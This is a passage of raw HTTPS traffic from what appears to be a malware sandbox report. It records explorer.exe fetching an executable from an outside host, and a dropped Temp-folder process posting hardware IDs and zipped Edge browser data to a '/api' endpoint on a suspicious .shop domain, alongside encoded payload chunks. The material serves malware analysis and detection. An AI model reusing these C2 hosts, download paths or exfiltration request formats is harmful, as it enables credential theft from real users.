                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJ0AuYIQMPXL7sqF0ELuQpLhdtebZv2oRR20GCns%2BCcE1EB80%2B4o6EJq0YM1sdw9f6TLmC3cofJvzHVX6iaqtwRHrKLtmkgSUFMAWi%2FGkyNgl8Q3R7SNpc2IVWxuL%2FAFoioh2VoS9tE33ag%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91fe4fde59c61-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC557INData Raw: 32 36 30 32 0d 0a 30 35 35 39 41 58 79 6c 49 47 46 30 58 6c 45 75 6a 31 66 6b 75 73 53 47 2f 7a 43 6c 44 67 34 77 70 51 67 31 2b 6c 39 6a 6a 49 6d 6f 6b 33 63 68 58 49 55 41 51 77 4a 38 61 77 36 37 65 2b 6d 77 35 4b 62 66 45 49 64 39 61 78 4b 66 4b 45 47 49 4b 67 61 67 68 4e 6d 2b 58 53 46 63 68 30 45 46 56 6d 52 78 53 4f 34 37 6c 39 2f 6f 69 2f 55 51 68 53 34 75 45 73 42 77 46 38 42 2f 4f 49 47 44 38 37 35 64 49 56 79 46 57 32 78 2b 66 6e 45 4f 72 33 66 45 6d 75 53 6b 6d 6c 36 48 4e 43 34 53 77 47 4a 58 6d 7a 4d 42 37 65 4b 38 37 68 46 69 46 4d 6c 48 43 52 45 39 4e 55 2f 6a 4f 6f 48 66 6f 65 65 56 58 73 78 6a 5a 6c 32 48 4a 44 6a 77 66 30 4f 73 71 66 4f 2b 58 53 46 65 77 46 70 44 54 6e 35 7a 59 2b 6f 6a 68 66 65 6c 39 5a 51 53 71 41 51 75 45 49 55 6f 46
                                                                                                                                                                                                                                      Data Ascii: 26020559AXylIGF0XlEuj1fkusSG/zClDg4wpQg1+l9jjImok3chXIUAQwJ8aw67e+mw5KbfEId9axKfKEGIKgaghNm+XSFch0EFVmRxSO47l9/oi/UQhS4uEsBwF8B/OIGD875dIVyFW2x+fnEOr3fEmuSkml6HNC4SwGJXmzMB7eK87hFiFMlHCRE9NU/jOoHfoeeVXsxjZl2HJDjwf0OsqfO+XSFewFpDTn5zY+ojhfel9ZQSqAQuEIUoF
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 43 35 65 53 79 39 42 52 78 48 74 56 45 44 68 4d 75 4e 55 6e 6a 50 34 58 4b 72 4f 71 62 55 63 35 6e 5a 56 66 41 62 68 66 57 55 6d 6d 73 71 66 4f 2b 58 53 46 63 68 51 49 45 44 6e 78 72 44 71 30 55 69 39 4f 71 37 6f 70 53 68 77 4d 45 45 49 55 6f 46 64 70 2f 48 71 43 45 32 62 35 64 49 56 79 46 41 42 70 35 56 48 45 4f 72 33 66 45 6d 75 53 6d 33 56 58 4c 4c 44 51 51 68 32 35 57 6e 44 77 46 34 4f 57 31 38 42 6c 74 45 38 68 45 43 52 59 37 4f 55 54 6c 4e 49 76 54 71 65 53 59 58 38 4e 71 59 46 50 43 4b 68 6e 33 56 55 4f 73 71 66 4f 2b 58 53 46 63 68 30 55 62 56 6d 52 78 44 4d 4d 79 68 63 72 6b 30 5a 35 63 79 57 74 36 45 71 67 43 46 64 70 2f 51 36 79 70 72 72 4a 77 43 31 79 46 41 45 46 55 66 69 6f 6a 68 58 66 45 6d 75 53 6d 33 78 43 46 4c 47 74 65 68 7a 49 56 32 44
                                                                                                                                                                                                                                      Data Ascii: C5eSy9BRxHtVEDhMuNUnjP4XKrOqbUc5nZVfAbhfWUmmsqfO+XSFchQIEDnxrDq0Ui9Oq7opShwMEEIUoFdp/HqCE2b5dIVyFABp5VHEOr3fEmuSm3VXLLDQQh25WnDwF4OW18BltE8hECRY7OUTlNIvTqeSYX8NqYFPCKhn3VUOsqfO+XSFch0UbVmRxDMMyhcrk0Z5cyWt6EqgCFdp/Q6yprrJwC1yFAEFUfiojhXfEmuSm3xCFLGtehzIV2D
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 76 50 42 66 4c 58 47 76 41 45 46 55 66 6e 45 4f 72 33 66 47 33 37 36 6b 78 52 43 48 52 6d 39 47 78 47 41 56 72 54 34 50 34 4f 79 6e 76 48 41 4c 58 49 55 41 51 56 52 2b 4c 41 4b 43 58 63 53 61 35 4b 62 66 45 4e 34 44 42 42 43 46 4b 42 58 61 66 30 4f 73 71 37 62 77 58 7a 74 63 68 30 38 43 48 6a 6f 68 51 2b 41 32 69 4e 61 70 34 5a 4a 61 78 32 78 68 56 38 4e 68 58 4a 73 77 42 66 7a 68 73 66 51 61 59 68 54 4e 41 6b 31 35 56 48 45 4f 72 33 66 45 6d 75 53 6d 33 56 58 66 4c 44 51 51 68 31 74 41 6b 33 38 30 37 65 57 2f 2b 77 6b 6a 63 61 38 41 51 56 52 2b 63 51 37 79 65 2b 6d 77 35 4b 62 66 45 49 55 75 64 54 32 76 4b 42 58 61 66 30 4f 73 71 66 4f 38 47 47 39 65 6e 77 42 44 47 7a 51 32 53 65 49 30 6a 4e 61 6a 37 70 46 61 79 57 39 2b 58 63 4e 71 57 35 41 33 44 4f 44
                                                                                                                                                                                                                                      Data Ascii: vPBfLXGvAEFUfnEOr3fG376kxRCHRm9GxGAVrT4P4OynvHALXIUAQVR+LAKCXcSa5KbfEN4DBBCFKBXaf0Osq7bwXztch08CHjohQ+A2iNap4ZJax2xhV8NhXJswBfzhsfQaYhTNAk15VHEOr3fEmuSm3VXfLDQQh1tAk3807eW/+wkjca8AQVR+cQ7ye+mw5KbfEIUudT2vKBXaf0OsqfO8GG9enwBDGzQ2SeI0jNaj7pFayW9+XcNqW5A3DOD
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 58 70 78 72 77 42 42 56 48 35 78 44 71 39 33 78 74 2b 71 70 4d 55 51 68 32 39 6f 55 73 5a 71 58 34 6f 39 45 2b 72 6f 74 2f 49 57 62 42 54 49 51 77 30 63 4e 54 52 4c 34 44 4f 4a 32 36 6e 6c 6d 56 7a 47 4c 43 49 39 72 79 67 56 32 6e 39 44 72 4b 6e 7a 76 42 68 37 58 70 38 41 51 7a 6b 2f 4a 55 61 74 57 75 36 61 35 4b 62 66 45 49 56 7a 49 6a 32 76 4b 42 58 61 66 30 4f 73 38 74 36 55 58 53 46 63 68 51 42 42 56 48 35 7a 53 2b 46 31 33 70 72 6d 37 70 46 57 78 47 42 6c 58 73 70 72 55 35 38 77 42 65 37 74 74 2f 6b 65 61 42 62 4c 54 51 6b 61 4f 44 39 46 36 7a 6d 46 32 36 43 6b 30 7a 32 76 4c 69 34 51 68 53 67 56 32 6e 39 42 36 66 50 78 70 46 30 6a 50 38 70 4a 44 78 59 2f 49 6b 75 74 57 75 36 61 35 4b 62 66 45 49 56 7a 49 6a 32 76 4b 42 58 61 66 30 4f 73 38 74 36 55
                                                                                                                                                                                                                                      Data Ascii: XpxrwBBVH5xDq93xt+qpMUQh29oUsZqX4o9E+rot/IWbBTIQw0cNTRL4DOJ26nlmVzGLCI9rygV2n9DrKnzvBh7Xp8AQzk/JUatWu6a5KbfEIVzIj2vKBXaf0Os8t6UXSFchQBBVH5zS+F13prm7pFWxGBlXsprU58wBe7tt/keaBbLTQkaOD9F6zmF26Ck0z2vLi4QhSgV2n9B6fPxpF0jP8pJDxY/IkutWu6a5KbfEIVzIj2vKBXaf0Os8t6U
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 67 4d 62 48 35 2b 63 51 36 76 64 38 54 42 79 59 7a 66 45 49 55 75 4c 68 43 46 4b 42 65 66 4d 55 47 32 71 66 48 77 46 6d 55 59 77 6b 34 43 45 44 51 32 52 4f 6b 30 67 4e 36 6c 36 35 6c 58 78 6d 4e 6f 58 73 6c 67 56 70 6b 78 43 75 48 67 74 4c 78 52 44 48 61 46 41 45 46 55 66 6e 45 4f 72 33 57 42 77 4f 61 38 33 78 4c 32 62 33 70 46 31 32 59 58 39 31 56 44 72 4b 6e 7a 76 6c 31 38 55 4b 67 71 51 56 52 2b 63 51 36 76 4c 4f 6d 77 35 4b 62 66 45 49 55 75 4c 68 43 48 62 56 76 59 5a 55 4f 75 36 71 50 32 46 57 30 62 79 45 63 41 47 54 73 2b 53 75 45 2f 6a 39 43 67 36 35 52 41 78 47 42 69 56 63 6c 6d 57 5a 55 33 41 75 4f 72 2f 35 4e 33 49 56 79 46 41 45 46 55 66 6e 45 4d 36 69 33 47 67 4f 53 6b 73 56 58 4b 51 6d 64 65 77 43 6f 34 38 48 39 44 72 4b 6e 7a 76 67 41 74 63
                                                                                                                                                                                                                                      Data Ascii: gMbH5+cQ6vd8TByYzfEIUuLhCFKBefMUG2qfHwFmUYwk4CEDQ2ROk0gN6l65lXxmNoXslgVpkxCuHgtLxRDHaFAEFUfnEOr3WBwOa83xL2b3pF12YX91VDrKnzvl18UKgqQVR+cQ6vLOmw5KbfEIUuLhCHbVvYZUOu6qP2FW0byEcAGTs+SuE/j9Cg65RAxGBiVclmWZU3AuOr/5N3IVyFAEFUfnEM6i3GgOSksVXKQmdewCo48H9DrKnzvgAtc
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 50 55 31 73 4f 72 33 66 45 6d 75 53 6d 33 78 4c 41 59 43 77 4b 68 53 70 54 6b 6a 30 4d 35 4f 43 2b 2f 78 68 74 48 73 70 49 45 52 34 38 4d 30 4c 72 4e 49 72 64 70 2b 69 65 51 4d 74 71 59 56 54 50 65 42 66 57 55 6d 6d 73 71 66 4f 2b 58 53 46 63 68 51 49 45 44 6e 78 72 44 71 30 56 6a 64 53 6c 36 4a 78 56 38 6d 39 69 58 4d 42 38 46 2f 64 56 51 36 79 70 38 37 35 64 66 46 43 73 4c 57 74 39 66 6e 46 56 67 6c 33 45 6d 75 53 6d 33 78 43 46 4c 69 78 56 79 79 6f 50 32 6e 30 4d 34 75 47 38 2b 52 74 72 47 63 52 44 44 78 49 78 50 6b 6a 6b 4d 59 50 4b 74 4f 4b 54 55 73 68 69 59 31 37 56 5a 46 4b 59 4d 55 47 67 68 4e 6d 2b 58 53 46 63 68 51 42 42 56 48 77 30 56 4b 31 74 78 4a 69 58 38 35 30 53 71 41 51 75 45 49 55 6f 46 64 6f 69 54 34 57 45 32 5a 4e 33 43 46 79 46 57 32
                                                                                                                                                                                                                                      Data Ascii: PU1sOr3fEmuSm3xLAYCwKhSpTkj0M5OC+/xhtHspIER48M0LrNIrdp+ieQMtqYVTPeBfWUmmsqfO+XSFchQIEDnxrDq0VjdSl6JxV8m9iXMB8F/dVQ6yp875dfFCsLWt9fnFVgl3EmuSm3xCFLixVyyoP2n0M4uG8+RtrGcRDDxIxPkjkMYPKtOKTUshiY17VZFKYMUGghNm+XSFchQBBVHw0VK1txJiX850SqAQuEIUoFdoiT4WE2ZN3CFyFW2
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 56 4b 31 74 78 4a 69 46 38 34 31 66 68 77 4d 45 45 49 55 6f 46 64 70 2f 48 71 43 45 32 62 35 64 49 56 79 46 41 42 70 35 56 48 45 4f 72 33 66 45 6d 75 53 6d 33 56 58 4c 4c 44 51 51 68 32 4a 61 6b 44 63 46 36 65 61 32 2b 68 5a 78 46 38 4a 4d 41 78 49 33 50 45 72 70 4e 6f 62 4b 6f 4f 43 56 55 63 70 68 59 6c 48 44 4b 68 6e 33 56 55 4f 73 71 66 4f 2b 58 53 46 63 68 30 55 62 56 6d 52 78 44 4e 38 34 69 4d 4f 70 34 34 78 59 68 77 4d 45 45 49 55 6f 46 64 70 2f 48 71 43 45 32 62 35 64 49 56 79 46 41 42 70 35 56 48 45 4f 72 33 66 45 6d 75 53 6d 33 56 58 4c 4c 44 51 51 68 32 35 5a 69 6a 59 41 35 65 43 2f 2b 78 42 6d 46 4d 64 4e 42 78 55 79 4f 45 33 75 50 59 76 56 71 4f 36 55 57 38 42 67 61 46 57 48 4a 44 6a 77 66 30 4f 73 71 66 4f 2b 58 53 46 65 77 46 70 44 54 6e 35
                                                                                                                                                                                                                                      Data Ascii: VK1txJiF841fhwMEEIUoFdp/HqCE2b5dIVyFABp5VHEOr3fEmuSm3VXLLDQQh2JakDcF6ea2+hZxF8JMAxI3PErpNobKoOCVUcphYlHDKhn3VUOsqfO+XSFch0UbVmRxDN84iMOp44xYhwMEEIUoFdp/HqCE2b5dIVyFABp5VHEOr3fEmuSm3VXLLDQQh25ZijYA5eC/+xBmFMdNBxUyOE3uPYvVqO6UW8BgaFWHJDjwf0OsqfO+XSFewFpDTn5
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC967INData Raw: 6f 33 53 71 4f 32 50 45 6f 6b 44 42 42 43 46 4b 42 58 61 66 30 4f 73 71 37 62 6b 58 7a 74 63 68 32 67 59 46 7a 45 2f 44 73 4d 2b 6b 4e 2f 6b 78 5a 4e 5a 77 47 42 36 45 71 67 43 46 64 70 2f 51 36 79 70 72 72 4a 77 43 31 79 46 41 45 46 55 66 69 6f 6a 68 58 66 45 6d 75 53 6d 33 78 43 46 4c 47 74 65 68 7a 49 56 32 44 51 50 34 75 69 32 39 42 64 6d 48 73 78 43 44 42 77 79 4e 46 37 6e 4f 59 7a 4b 71 65 65 51 56 73 70 6d 61 56 76 56 62 31 36 65 66 55 2b 42 67 2f 4f 2b 58 53 46 63 68 51 42 42 56 6a 73 72 44 4c 56 33 78 75 43 74 36 71 39 52 33 43 77 44 4f 6f 55 6f 46 64 70 2f 51 2f 47 6c 33 70 52 64 49 56 79 46 41 45 45 50 55 31 73 4f 72 33 66 45 6d 75 53 6d 33 78 4c 41 59 43 77 4b 68 53 70 55 6e 7a 34 41 35 4f 4b 39 38 78 68 6e 44 4d 31 46 45 52 63 39 4f 45 48 68
                                                                                                                                                                                                                                      Data Ascii: o3SqO2PEokDBBCFKBXaf0Osq7bkXztch2gYFzE/DsM+kN/kxZNZwGB6EqgCFdp/Q6yprrJwC1yFAEFUfiojhXfEmuSm3xCFLGtehzIV2DQP4ui29BdmHsxCDBwyNF7nOYzKqeeQVspmaVvVb16efU+Bg/O+XSFchQBBVjsrDLV3xuCt6q9R3CwDOoUoFdp/Q/Gl3pRdIVyFAEEPU1sOr3fEmuSm3xLAYCwKhSpUnz4A5OK98xhnDM1FERc9OEHh
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC1369INData Raw: 32 36 31 36 0d 0a 77 59 62 31 36 66 41 45 4d 57 4e 6a 6c 47 34 7a 57 42 79 71 44 74 6e 56 48 56 62 32 70 61 77 57 5a 62 6c 54 55 49 37 75 36 36 38 52 52 75 47 4d 64 4a 41 6c 5a 79 58 43 53 47 58 73 62 66 76 71 54 46 45 49 64 64 59 56 7a 44 5a 46 53 49 4f 6b 47 42 67 39 71 2b 58 58 78 51 71 43 70 6f 56 48 34 71 49 34 56 65 37 5a 69 68 36 4e 30 4b 68 53 78 6a 57 39 56 74 55 70 41 30 41 65 44 69 75 50 73 62 59 42 2f 44 54 67 77 66 50 7a 74 4e 35 54 71 46 32 4b 33 73 6c 31 50 4a 61 53 77 63 71 41 49 38 38 33 30 47 39 71 76 70 76 6c 39 4d 48 63 4a 4a 41 6c 51 62 4e 55 76 68 64 65 6d 77 7a 61 62 66 54 59 6b 44 42 44 6d 46 4b 45 37 33 56 57 71 46 71 37 62 77 58 7a 74 63 68 30 45 48 47 44 55 38 53 4f 63 79 68 74 2b 67 35 4a 56 5a 79 6d 64 2b 56 38 6c 76 56 70 67
                                                                                                                                                                                                                                      Data Ascii: 2616wYb16fAEMWNjlG4zWByqDtnVHVb2pawWZblTUI7u668RRuGMdJAlZyXCSGXsbfvqTFEIddYVzDZFSIOkGBg9q+XXxQqCpoVH4qI4Ve7Zih6N0KhSxjW9VtUpA0AeDiuPsbYB/DTgwfPztN5TqF2K3sl1PJaSwcqAI8830G9qvpvl9MHcJJAlQbNUvhdemwzabfTYkDBDmFKE73VWqFq7bwXztch0EHGDU8SOcyht+g5JVZymd+V8lvVpg


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.649723192.185.16.1144434004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC167OUTGET /TEMPradius.exe HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: nessotechbd.com
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC271INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:23 GMT
                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                      Last-Modified: Sun, 19 Jun 2022 19:44:22 GMT
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Content-Length: 744
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC744INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64
                                                                                                                                                                                                                                      Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>503 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noind


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.649724104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:24 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 14034
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:24 UTC14034OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 31 31 34 44 42 45 36 31 38 44 43 45 34 39 45 39 36 41 33 42 43 30 36 42 38 41 41 34 44 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                                                                                                                                                                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"45114DBE618DCE49E96A3BC06B8AA4D3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                                                                                                                                                                                                                                      2024-03-28 16:51:24 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=sne5goifceohn9pnlbf2p93hc6; expires=Mon, 22-Jul-2024 10:38:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BGRJeyoLIhDNGEmT8tCI0go1T35j13643EK%2FVPyqmoBdZ68WSuhzhyuNuV02Lv%2BTi6VIKZzAd8f0MZmAx6jX54QUvgfhSdSJ%2F3CElcdDnTacYFaQDHKhAtSdSJoOAhe4j0g60z%2BB7ZMffvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91feb69740790-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:24 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 10ok 102.165.48.43
                                                                                                                                                                                                                                      2024-03-28 16:51:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.649726104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 16264
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 31 31 34 44 42 45 36 31 38 44 43 45 34 39 45 39 36 41 33 42 43 30 36 42 38 41 41 34 44 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                                                                                                                                                                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"45114DBE618DCE49E96A3BC06B8AA4D3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC933OUTData Raw: 2f 44 65 66 61 75 6c 74 2f 42 72 6f 77 73 65 72 44 42 2f 4d 41 4e 49 46 45 53 54 2d 30 30 30 30 30 31 01 29 00 d6 ff 95 7c b9 c5 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 75 1d 9c a6 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 0e 18 a7 1a 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: /Default/BrowserDB/MANIFEST-000001)|"leveldb.BytewiseComparatorPKP{.)PKuEdge/BrowserVersion.txtPK% WEdge/dp.txtPKA`
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=b4bvd6vp7ls7pv940vbl8q2l96; expires=Mon, 22-Jul-2024 10:38:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ba7X7la20TzDvdld9%2Biv8cTVr3YQOsQAcSgk8tGbe7GTL0n9Xn%2FaBXLIIHF1rVYqWOYrZ6QW%2Fnnl1kBzE94hVitEwe2mTvgUPv%2F44luFiVeddm0edG%2BZazhjwUWNkxZB%2FlXic4ogQ8uC%2B3U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91ff298e6822d-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 10ok 102.165.48.43
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.649727172.253.115.1384434004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC211OUTGET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1
